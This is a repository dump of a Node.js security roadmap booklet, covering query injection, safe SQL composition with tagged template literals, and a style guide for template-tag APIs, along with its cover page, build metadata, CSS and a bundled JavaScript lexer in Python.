173 | "SELECT X FROM T WHERE X IN (123, 'foo', `foo`, 1 + 1)", 174 | () => index.sql`SELECT X FROM T WHERE X IN (${values})`) 175 | }) 176 | }) 177 | }) 178 | -------------------------------------------------------------------------------- /chapter-7/libraries.md: -------------------------------------------------------------------------------- 1 | # Library support for Safe Coding Practices 2 | 3 | The way we structure libraries and APIs affect the idioms that are 4 | available to developers. 5 | 6 | If the easiest ways to express ideas are also secure against a 7 | particular class of attack, then developers who have seen ideas 8 | expressed those ways will tend to produce code that is secure 9 | against that class of attack. 10 | 11 | Next, we introduce a few such idioms, show how they can be better 12 | addressed via a rarely used but powerful JavaScript 13 | feature, and end with some ideas on how to foster consistent, 14 | powerful, and secure APIs for a class of problems that often have 15 | security consequences: composing structured strings to send to 16 | external agents. 17 | -------------------------------------------------------------------------------- /chapter-7/query-langs.md: -------------------------------------------------------------------------------- 1 | # Query injection 2 | 3 | Threats: [QUI][] 4 | 5 | One piece of simple advice to avoid [query injection attacks][QUI] is 6 | "just use [prepared statements][]." 7 | 8 | This is good advice, and the [`mysql`][] library has a 9 | solid, well-documented API for producing secure prepared statements. 10 | 11 | Developers could do 12 | 13 | ```js 14 | const mysql = require('mysql'); 15 | ... 16 | connection.query( 17 | 'SELECT * FROM T WHERE x = ?, y = ?, z = ?', 18 | [ x, y, z], 19 | callback); 20 | ``` 21 | 22 | which is secure since `.query` calls `mysql.format` under the hood 23 | to escape `x`, `y`, and `z`. Enough developers still do 24 | 25 | ```js 26 | connection.query( 27 | "SELECT * FROM T WHERE x = '" + x + "', y = '" + y + "', z='" + z + "'", 28 | callback); 29 | ``` 30 | 31 | to make query injection a real problem. 32 | 33 | 34 | Developers may not know about prepared statements, but prepared 35 | statements have other problems: 36 | 37 | * They rely on a **correspondence between positional parameters** 38 | and the '`?`'s placeholders that they fill. When a prepared statement 39 | has more substitutions than fit in a reader's working memory, they 40 | have to look back and forth between the prepared statement, and the 41 | parameter list. 42 | * Prepared statements do not make it easy to **compose a query** from 43 | simpler query fragments. It's not easy to compute the `WHERE` 44 | clause separately from the result column set and then combine the 45 | two into a query without resorting to string concatenation 46 | somewhere along the line. 47 | 48 | 49 | ## Template literals 50 | 51 | JavaScript has a rarely used feature that lets us get the best of 52 | both worlds. 53 | 54 | 55 | ```js 56 | connection.query`SELECT * FROM T WHERE x = ${x}, y = ${y}, z = ${z}`(callback) 57 | ``` 58 | 59 | uses a [tagged template literal][] to allow inline expressions in SQL 60 | syntax. 61 | 62 | > A more advanced form of template literals are tagged template 63 | > literals. Tags allow you to parse template literals with a 64 | > function. The first argument of a tag function contains an array of 65 | > string values. The remaining arguments are related to the 66 | > expressions. In the end, your function can return your manipulated 67 | > string (or it can return something completely different ...). 68 | 69 | The code above is almost equivalent to 70 | 71 | ```js 72 | connection.query( 73 | ['SELECT * FROM T WHERE x = ', ', y = ', ', z = ', ''], 74 | x y z 75 | )(callback); 76 | ``` 77 | 78 | `connection.query` gets called with the parts of the static 79 | template string specified by the author, followed by the results of 80 | the expressions. The final `(callback)` dispatches the query. 81 | 82 | We can tweak SQL APIs so that, when used as template literal tags, 83 | they escape the dynamic parts to preserve the intent of the author of 84 | the static parts, and then re-interleave them to produce the query. 85 | 86 | The example ([code][sql-code]) accompanying this chapter implements 87 | this idea by defining a `mysql.sql` function that parses the static 88 | parts to choose appropriate escapers for the dynamic parts. 89 | We have put together a [draft PR][mysql-PR] to integrate this into 90 | the *mysql* module. 91 | 92 | It also provides string wrappers, `Identifier` and `SqlFragment`, to 93 | make it easy to compose complex queries from simpler parts: 94 | 95 | ```js 96 | // Compose a query from two fragments. 97 | // When the value inside ${...} is a SqlFragment, no extra escaping happens. 98 | connection.query` 99 | SELECT ${outputColumnsAndJoins(a, b, c)} 100 | WHERE ${rowFilter(x, y, z)} 101 | `(callback) 102 | 103 | // Returns a SqlFragment 104 | function rowFilter(x, y, z) { 105 | if (complexCondition) { 106 | // mysql.sql returns a SqlFragment 107 | return mysql.sql`X = ${x}`; 108 | } else { 109 | return mysql.sql`Y = ${y} AND Z=${z}`; 110 | } 111 | } 112 | 113 | function outputColumnsAndJoins(a, b, c) { 114 | return mysql.sql`...`; 115 | } 116 | ``` 117 | 118 | ---- 119 | 120 | Our goal was to make the easiest way to express an idea a secure way. 121 | 122 | As seen below, this template tag API is the shortest way to express 123 | this idea as shown below. It is also tolerant to small variations 124 | — the author may leave out quotes since the tag implementation 125 | knows whether a substitution is inside quotes. 126 | 127 | Shorter & tolerant != easier, but we hope that being shorter, more 128 | robust, more secure, and easy to compose will make it a good migration 129 | target for teams that realize they have a problem with SQL injection. 130 | We also hope these factors will cause developers who have been through 131 | such a migration to continue to use it in subsequent projects where it 132 | may spread to other developers. 133 | 134 | 135 | ```js 136 | // Proposed: Secure, tolerant, composes well. 137 | connection.query`SELECT * FROM T WHERE x=${x}`(callback) 138 | connection.query`SELECT * FROM T WHERE x="${x}"`(callback) 139 | 140 | // String concatenation. Insecure, composes well. 141 | connection.query('SELECT * FROM T WHERE x = "' + x + '"', callback) 142 | connection.query(`SELECT * FROM T WHERE x = "${x}"`, callback) 143 | 144 | // String concatenation is not tolerant. 145 | // Broken in a way that will be caught during casual testing. 146 | connection.query('SELECT * FROM T WHERE x = ' + x, callback) 147 | connection.query(`SELECT * FROM T WHERE x = ${x}`, callback) 148 | 149 | // Prepared Statements. Secure, composes badly, positional parameters. 150 | connection.query('SELECT * FROM T WHERE x = ?', x, callback) 151 | connection.query('SELECT * FROM T WHERE x = "?"', x, callback) // Subtly broken 152 | ``` 153 | 154 | 155 | 156 | [`mysql`]: https://www.npmjs.com/package/mysql 157 | [QUI]: ../chapter-1/threat-QUI.md 158 | [prepared statements]: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet#Defense_Option_1:_Prepared_Statements_.28with_Parameterized_Queries.29 159 | [tagged template literal]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#Tagged_template_literals 160 | [sql-code]: https://github.com/google/node-sec-roadmap/tree/master/chapter-7/examples/sql 161 | [mysql-PR]: https://github.com/mysqljs/mysql/pull/1926 162 | -------------------------------------------------------------------------------- /chapter-7/structured-strings.md: -------------------------------------------------------------------------------- 1 | # Structured Strings 2 | 3 | Both of the previously discussed problems, query injection and shell 4 | injection, are facets of a common problem: it is hard to securely 5 | compose strings to send outside the process. In the first case, 6 | we send a query string to a database via a file descriptor bound to a 7 | network socket or an IPC endpoint. In the second, we send a string 8 | via a syscall wrapper, to spawn a child process. 9 | 10 | ## Success Criteria 11 | 12 | We can securely compose strings for external endpoints if: 13 | 14 | * Developers routinely use tools to produce structured strings 15 | that preserve developers' intent even in the face of inputs 16 | crafted by a skilled attacker, and/or 17 | * Where developers do not, the backends grant no authority based on 18 | the structure of the string, and the authority granted ambiently is 19 | so small as to not be abusable. 20 | 21 | Nailing down the definition of *intent* is hard, but here's an example 22 | of how we can in one context. Consider 23 | 24 | ```js 25 | "SELECT * FROM T WHERE id=" + f(accountNumber) 26 | ``` 27 | 28 | A reasonable reader would conclude that the author intended: 29 | 30 | * That the result specifies one statement, a select statement. 31 | * That `f(accountNumber)` specifies only a simple value that 32 | can be compared to values in the *id* column. 33 | 34 | Given that, we can say `function f(x)` preserves intent in that code 35 | if, for any value of `accountNumber`, it throws an exception or 36 | its output following "`SELECT * FROM T WHERE id=`" parses as a 37 | single number or string literal token. 38 | 39 | 40 | 41 | ## A possible solution 42 | 43 | ### Change the world so we can give simple answers to hard questions. 44 | 45 | Extend existing APIs so that whenever a developer is composing a 46 | string to send outside the `node` process, they have a template 47 | literal tag based API that is more secure than string concatenation. 48 | 49 | Then, we can give developers a simple piece of advice: 50 | 51 | > If you're composing a string that will end up outside node, use 52 | > a template tag. 53 | 54 | Template tags will have implementation bugs, but fixing one template 55 | tag is easier than fixing many expressions of the form 56 | `("foo " + bar + " baz")`. 57 | 58 | 59 | ### A common style guide for tag implementers. 60 | 61 | It would help developers if these template literal tags had some 62 | consistency across libraries. We've already briefly discussed ways to 63 | make template tags more discoverable and usable when talking about 64 | ways to treat [generated code][synthetic modules] as first class. 65 | 66 | We propose a style guide for tag authors. 67 | Others will probably have better ideas as to what it should contain, but 68 | to get a discussion started: 69 | 70 | - Functions that compose or represent a string whose recipient is outside 71 | the node runtime should accept template tags. 72 | Examples include `mysql.format` which composes a string of SQL. 73 | - These functions should return a typed string wrapper. 74 | For example, if the output is a string of *SQL* tokens, 75 | then return an instance of: 76 | ```js 77 | function SqlFragment(s) { 78 | if (!(this instanceof SqlFragment)) { return new SqlFragment(s); } 79 | this.content = String(s); 80 | } 81 | SqlFragment.prototype.toString = (() => this.content); 82 | ``` 83 | Don't re-escape `SqlFragment`s received as interpolation values 84 | where they make sense. 85 | - See if you can reuse string wrappers from a library before rolling 86 | your own to encourage interoperability. 87 | If a library defines a type representing a fragment of HTML, use that 88 | as long as your operator can uphold the type's contract. 89 | For example if the type has a particular [security contract][], 90 | make sure that you preserve that security contract. 91 | You may assume that wrapped strings come from a source that upheld 92 | the contract. 93 | Producing a value that doesn't uphold its contract when your inputs do 94 | is a bug, but assuming incorrectly that type contracts hold for your 95 | inputs is not. 96 | If you can double check inputs, great! 97 | - The canonical way to test whether a function was (very probably) 98 | called as a template tag is 99 | ```js 100 | function (a, ...b) { 101 | if (Array.isArray(a) && Array.isArray(a.raw) 102 | && Object.isFrozen(a) 103 | && a.length === b.length + 1) { 104 | // Treat as template tag. 105 | } 106 | // Handle non template tag use. 107 | } 108 | ``` 109 | - When a template tag takes options objects, it should 110 | be possible to curry those before invoking the function as a tag. 111 | The following passes some environment variables and a working directory 112 | before the command: 113 | ```js 114 | shelljs.exec({ env: ..., cwd: ... })`cat ...` 115 | ``` 116 | - When a template tag takes a `callback`, the template tag should 117 | return a function that will receive the callback. 118 | The following uses a template tag that returns a function that 119 | takes a callback: 120 | ```js 121 | myConnection.query`SELECT ...`(callback) 122 | ``` 123 | - Where possible, allow indenting multi-line template tags. 124 | Use the first line with non-whitespace characters as a cue 125 | when stripping whitespace from the rest of the lines. 126 | 127 | ## Alternatives 128 | 129 | Database abstractions like object-relational mappings are a great way 130 | to get developers out of the messy business of composing queries. 131 | 132 | There are still niche use cases like ad-hoc reporting that require 133 | composing queries, and solving the problem for database queries does 134 | not solve it for strings sent elsewhere, e.g. shells. 135 | 136 | Builder APIs provide a flexible way to compose structured content. 137 | For example, 138 | 139 | ```java 140 | new QueryBuilder() 141 | .select() 142 | .innerJoin(...).on(...) 143 | .columns(...) 144 | .where(...) 145 | .orderBy(...) 146 | .build() 147 | ``` 148 | 149 | The explicit method calls specify the structure of the resulting 150 | string, so controlling parameters doesn't grant control of sentence 151 | structure, and control of one parameter doesn't allow reinterpreting 152 | part of the query specified by an uncontrolled parameter. 153 | 154 | In JavaScript we prefer tagged templates to builders. These APIs can 155 | be syntactically heavy and developers have to discover and learn them. 156 | We hope that adoption with template tags will be easier because: 157 | 158 | * Tagged templates are syntactically lighter so easier to write. 159 | * Someone unfamiliar with the API, but familiar with the query language, will 160 | have to do less work to leverage the one to understand the other making 161 | tagged templates easier to read and adapt for one's own work. 162 | * Builder APIs have to treat nested sub-languages (e.g. URLs in HTML) 163 | as strings unless there is a builder API for the sub-language. 164 | 165 | 166 | [security contract]: https://github.com/google/safe-html-types 167 | [synthetic modules]: ../chapter-2/synthetic-modules.html 168 | -------------------------------------------------------------------------------- /cover.md: -------------------------------------------------------------------------------- 1 | # A Roadmap for Node.js Security 2 | 3 | Node.js has a vibrant community of application developers and library 4 | authors built around a mature and well-maintained core runtime and 5 | library set. Its growing popularity is already drawing more attention 6 | from attackers. This roadmap discusses how some Node.js projects 7 | address security challenges, along with ways to make it easier 8 | for more projects to address these challenges in a thorough and 9 | consistent manner. 10 | 11 | This is not the opinion of any organization. It is the considered 12 | opinion of 13 | [some computer security professionals and Node.js enthusiasts][contributors] 14 | who have worked to make it easier to write secure, robust software on 15 | other platforms; who like a lot about Node.js; and who would like to 16 | help make it better. 17 | 18 | Our intended audience is Node.js library and infrastructure 19 | maintainers who want to stay ahead of the increased scrutiny that 20 | Node.js is getting from attackers. We have not researched whether, 21 | and do not assert that, any stack is inherently more or less secure 22 | than any other. 23 | 24 | Node.js security is especially important for “primary targets”. 25 | Targets are often subdivided into "primary targets" and "targets of 26 | opportunity." One attacks the latter if one happens to see a 27 | vulnerability. One goes out of their way to find vulnerabilities in 28 | the former. The practices which prevent one from becoming a target of 29 | opportunity might not be enough if one is a primary target of an actor 30 | with resources at their disposal. We hope that the ideas we present 31 | might help primary targets to defeat attacks while making targets of 32 | opportunity rarer and the entire ecosystem more secure. 33 | 34 | When addressing threats, we want to make sure we preserve Node.js's 35 | strengths. 36 | 37 | * Development teams can iterate quickly allowing them to explore a 38 | large portion of the design space. 39 | * Developers can use a wealth of publicly available packages to solve 40 | everyday problems. 41 | * Anyone who identifies a shared problem can write and publish a 42 | module to solve it, or send a pull request with a fix or extension 43 | to an existing project. 44 | * Node.js integrates with a wide variety of application containers so 45 | project teams have options when deciding how to deploy. 46 | * Using JavaScript on the front and back ends of Web applications 47 | allows developers to work both sides when need be. 48 | 49 | The individual chapters are largely independent of one another: 50 | 51 | "[Threat environment][]" discusses the kinds of threats that concern us. 52 | 53 | "[Dynamism when you need it][]" discusses how to preserve the power of 54 | CommonJS module linking, `vm` contexts, and runtime code generation 55 | while making sure that, in production, only code that the development 56 | team trusts gets run. 57 | 58 | "[Knowing your dependencies][]" discusses ways to help development 59 | teams make informed decisions about third-party dependencies. 60 | 61 | "[Keeping your dependencies close][]" discusses how keeping a local 62 | replica of portions of the larger npm repository affects security and 63 | aids incident response. 64 | 65 | "[Oversight][]" discusses how code-quality tools can help decouple 66 | security review from development. 67 | 68 | "[When all else fails][]" discusses how the development → 69 | production pipeline and development practices can affect the ability 70 | of security professionals to identify and respond to imminent threats. 71 | 72 | "[Library support for safe coding practices][]" discusses idioms 73 | that, if more widespread, might make it easier for developers to 74 | produce secure, robust systems. 75 | 76 | You can browse the supporting code via *[github.com/google/node-sec-roadmap/][]*. 77 | 78 | [contributors]: CONTRIBUTORS.md 79 | [Threat environment]: chapter-1/threats.md 80 | [Dynamism when you need it]: chapter-2/dynamism.md 81 | [Knowing your dependencies]: chapter-3/knowing_dependencies.md 82 | [Keeping your dependencies close]: chapter-4/close_dependencies.md 83 | [Oversight]: chapter-5/oversight.md 84 | [When all else fails]: chapter-6/failing.md 85 | [Library support for safe coding practices]: chapter-7/libraries.md 86 | [github.com/google/node-sec-roadmap/]: https://github.com/google/node-sec-roadmap/ 87 | -------------------------------------------------------------------------------- /images/FileExternal.svg: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 9 | 10 | -------------------------------------------------------------------------------- /images/GitHub-Mark-32px.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/google/node-sec-roadmap/8e01b94ee2a7bbae9c9f758131fd421e2a1c8aa6/images/GitHub-Mark-32px.png -------------------------------------------------------------------------------- /images/ic_print_24dp.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /images/npmjs-node.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/google/node-sec-roadmap/8e01b94ee2a7bbae9c9f758131fd421e2a1c8aa6/images/npmjs-node.png -------------------------------------------------------------------------------- /license.md: -------------------------------------------------------------------------------- 1 | 3 | 4 | 5 | Creative Commons License
A Roadmap for Node.js Security by https://github.com/google/node-sec-roadmap/ is licensed under a Creative Commons Attribution 4.0 International License. 6 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "version": "1.0.0", 3 | "name": "@mikesamuel/nodejs_sec_book", 4 | "description": "Booklet about NodeJS in organizations with large security profiles", 5 | "homepage": "https://github.com/google/node-sec-roadmap/", 6 | "license": "(Apache License 2.0 OR CC-BY-4.0)", 7 | "author": { 8 | "name": "Mike Samuel", 9 | "email": "mikesamuel@gmail.com", 10 | "url": "https://github.com/mikesamuel" 11 | }, 12 | "files": [ 13 | "www/**" 14 | ], 15 | "main": "www/index.html", 16 | "dependencies": { 17 | "gitbook": ">=3.2.3", 18 | "gitbook-cli": ">=2.3.2", 19 | "gitbook-plugin-ga": "^1.0.1", 20 | "gitbook-plugin-links": "^3.0.1", 21 | "svgexport": "^0.3.2" 22 | }, 23 | "private": true, 24 | "scripts": { 25 | "start": "make serve" 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /styles/website.css: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | .print-button.btn.links-link { 19 | display: inline-block; 20 | width: 30px; 21 | font-size: 0; 22 | background-image: url("/images/ic_print_24dp.svg"); 23 | background-repeat: no-repeat; 24 | background-position: center center; 25 | } 26 | 27 | .github-button.btn.links-link { 28 | display: inline-block; 29 | width: 30px; 30 | font-size: 0; 31 | background-image: url("/images/GitHub-Mark-32px.png"); 32 | background-repeat: no-repeat; 33 | background-position: center center; 34 | background-size: 20px; 35 | opacity: 0.25; 36 | } 37 | 38 | /* Style external links */ 39 | a[href^="http://"]:not([href^="http://www.gitbook.com"]), 40 | a[href^="https://"]:not([href^="https://www.gitbook.com"]), 41 | a[href^="//"]:not([href^="//www.gitbook.com"]) { 42 | background-image: url("/images/FileExternal.svg"); 43 | background-position: center right; 44 | background-repeat: no-repeat; 45 | background-size: 12px 12px; 46 | padding-right: 14px; 47 | } 48 | -------------------------------------------------------------------------------- /third_party/__init__.py: -------------------------------------------------------------------------------- 1 | # Copyright 2017 Google LLC 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # https://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | -------------------------------------------------------------------------------- /third_party/jslex/__init__.py: -------------------------------------------------------------------------------- 1 | # Copyright 2017 Google LLC 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # https://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | -------------------------------------------------------------------------------- /third_party/jslex/jslex.py: -------------------------------------------------------------------------------- 1 | # Copyright 2011-2015 Ned Batchelder. All rights reserved. 2 | # 3 | # Except where noted otherwise, this software is licensed under the Apache 4 | # License, Version 2.0 (the "License"); you may not use this work except in 5 | # compliance with the License. You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | 15 | # From https://bitbucket.org/ned/jslex/raw/a1ee4078977a3ef9c4682837c669637c04c417af/jslex.py 16 | # For details: https://bitbucket.org/ned/jslex/src/default/NOTICE.txt 17 | 18 | 19 | """JsLex: a lexer for Javascript""" 20 | 21 | import re 22 | 23 | class Tok(object): 24 | """A specification for a token class.""" 25 | 26 | num = 0 27 | 28 | def __init__(self, name, regex, next=None): 29 | self.id = Tok.num 30 | Tok.num += 1 31 | self.name = name 32 | self.regex = regex 33 | self.next = next 34 | 35 | def literals(choices, prefix="", suffix=""): 36 | """Create a regex from a space-separated list of literal `choices`. 37 | 38 | If provided, `prefix` and `suffix` will be attached to each choice 39 | individually. 40 | 41 | """ 42 | return "|".join(prefix+re.escape(c)+suffix for c in choices.split()) 43 | 44 | class Lexer(object): 45 | """A generic multi-state regex-based lexer.""" 46 | 47 | def __init__(self, states, first): 48 | self.regexes = {} 49 | self.toks = {} 50 | 51 | for state, rules in states.items(): 52 | parts = [] 53 | for tok in rules: 54 | groupid = "t%d" % tok.id 55 | self.toks[groupid] = tok 56 | parts.append("(?P<%s>%s)" % (groupid, tok.regex)) 57 | self.regexes[state] = re.compile("|".join(parts), re.MULTILINE|re.VERBOSE) 58 | 59 | self.state = first 60 | 61 | def lex(self, text): 62 | """Lexically analyze `text`. 63 | 64 | Yields pairs (`name`, `tokentext`). 65 | 66 | """ 67 | end = len(text) 68 | state = self.state 69 | regexes = self.regexes 70 | toks = self.toks 71 | start = 0 72 | 73 | while start < end: 74 | for match in regexes[state].finditer(text, start): 75 | name = match.lastgroup 76 | tok = toks[name] 77 | toktext = match.group(name) 78 | start += len(toktext) 79 | yield (tok.name, toktext) 80 | 81 | if tok.next: 82 | state = tok.next 83 | break 84 | 85 | self.state = state 86 | 87 | 88 | class JsLexer(Lexer): 89 | """A Javascript lexer 90 | 91 | >>> lexer = JsLexer() 92 | >>> list(lexer.lex("a = 1")) 93 | [('id', 'a'), ('ws', ' '), ('punct', '='), ('ws', ' '), ('dnum', '1')] 94 | 95 | This doesn't properly handle non-Ascii characters in the Javascript source. 96 | 97 | """ 98 | 99 | # Because these tokens are matched as alternatives in a regex, longer possibilities 100 | # must appear in the list before shorter ones, for example, '>>' before '>'. 101 | # 102 | # Note that we don't have to detect malformed Javascript, only properly lex 103 | # correct Javascript, so much of this is simplified. 104 | 105 | # Details of Javascript lexical structure are taken from 106 | # http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-262.pdf 107 | 108 | # A useful explanation of automatic semicolon insertion is at 109 | # http://inimino.org/~inimino/blog/javascript_semicolons 110 | 111 | both_before = [ 112 | Tok("comment", r"/\*(.|\n)*?\*/"), 113 | Tok("linecomment", r"//.*?$"), 114 | Tok("ws", r"\s+"), 115 | Tok("keyword", literals(""" 116 | break case catch class const continue debugger 117 | default delete do else enum export extends 118 | finally for function if import in instanceof new 119 | return super switch this throw try typeof var 120 | void while with 121 | """, suffix=r"\b"), next='reg'), 122 | Tok("reserved", literals("null true false", suffix=r"\b"), next='div'), 123 | Tok("id", r""" 124 | ([a-zA-Z_$ ]|\\u[0-9a-fA-Z]{4}) # first char 125 | ([a-zA-Z_$0-9]|\\u[0-9a-fA-F]{4})* # rest chars 126 | """, next='div'), 127 | Tok("hnum", r"0[xX][0-9a-fA-F]+", next='div'), 128 | Tok("onum", r"0[0-7]+"), 129 | Tok("dnum", r""" 130 | ( (0|[1-9][0-9]*) # DecimalIntegerLiteral 131 | \. # dot 132 | [0-9]* # DecimalDigits-opt 133 | ([eE][-+]?[0-9]+)? # ExponentPart-opt 134 | | 135 | \. # dot 136 | [0-9]+ # DecimalDigits 137 | ([eE][-+]?[0-9]+)? # ExponentPart-opt 138 | | 139 | (0|[1-9][0-9]*) # DecimalIntegerLiteral 140 | ([eE][-+]?[0-9]+)? # ExponentPart-opt 141 | ) 142 | """, next='div'), 143 | Tok("punct", literals(""" 144 | >>>= === !== >>> <<= >>= <= >= == != << >> && 145 | || += -= *= %= &= |= ^= 146 | """), next="reg"), 147 | Tok("punct", literals("++ -- ) ]"), next='div'), 148 | Tok("punct", literals("{ } ( [ . ; , < > + - * % & | ^ ! ~ ? : ="), next='reg'), 149 | Tok("string", r'"([^"\\]|(\\(.|\n)))*?"', next='div'), 150 | Tok("string", r"'([^'\\]|(\\(.|\n)))*?'", next='div'), 151 | ] 152 | 153 | both_after = [ 154 | Tok("other", r"."), 155 | ] 156 | 157 | states = { 158 | 'div': # slash will mean division 159 | both_before + [ 160 | Tok("punct", literals("/= /"), next='reg'), 161 | ] + both_after, 162 | 163 | 'reg': # slash will mean regex 164 | both_before + [ 165 | Tok("regex", 166 | r""" 167 | / # opening slash 168 | # First character is.. 169 | ( [^*\\/[] # anything but * \ / or [ 170 | | \\. # or an escape sequence 171 | | \[ # or a class, which has 172 | ( [^\]\\] # anything but \ or ] 173 | | \\. # or an escape sequence 174 | )* # many times 175 | \] 176 | ) 177 | # Following characters are same, except for excluding a star 178 | ( [^\\/[] # anything but \ / or [ 179 | | \\. # or an escape sequence 180 | | \[ # or a class, which has 181 | ( [^\]\\] # anything but \ or ] 182 | | \\. # or an escape sequence 183 | )* # many times 184 | \] 185 | )* # many times 186 | / # closing slash 187 | [a-zA-Z0-9]* # trailing flags 188 | """, next='div'), 189 | ] + both_after, 190 | } 191 | 192 | def __init__(self): 193 | super(JsLexer, self).__init__(self.states, 'reg') 194 | 195 | 196 | def js_to_c_for_gettext(js): 197 | """Convert the Javascript source `js` into something resembling C for xgettext. 198 | 199 | What actually happens is that all the regex literals are replaced with 200 | "REGEX". 201 | 202 | """ 203 | def escape_quotes(m): 204 | """Used in a regex to properly escape double quotes.""" 205 | s = m.group(0) 206 | if s == '"': 207 | return r'\"' 208 | else: 209 | return s 210 | 211 | lexer = JsLexer() 212 | c = [] 213 | for name, tok in lexer.lex(js): 214 | if name == 'regex': 215 | # C doesn't grok regexes, and they aren't needed for gettext, 216 | # so just output a string instead. 217 | tok = '"REGEX"' 218 | elif name == 'string': 219 | # C doesn't have single-quoted strings, so make all strings 220 | # double-quoted. 221 | if tok.startswith("'"): 222 | guts = re.sub(r"\\.|.", escape_quotes, tok[1:-1]) 223 | tok = '"' + guts + '"' 224 | elif name == 'id': 225 | # C can't deal with Unicode escapes in identifiers. We don't 226 | # need them for gettext anyway, so replace them with something 227 | # innocuous 228 | tok = tok.replace("\\", "U") 229 | c.append(tok) 230 | return ''.join(c) 231 | --------------------------------------------------------------------------------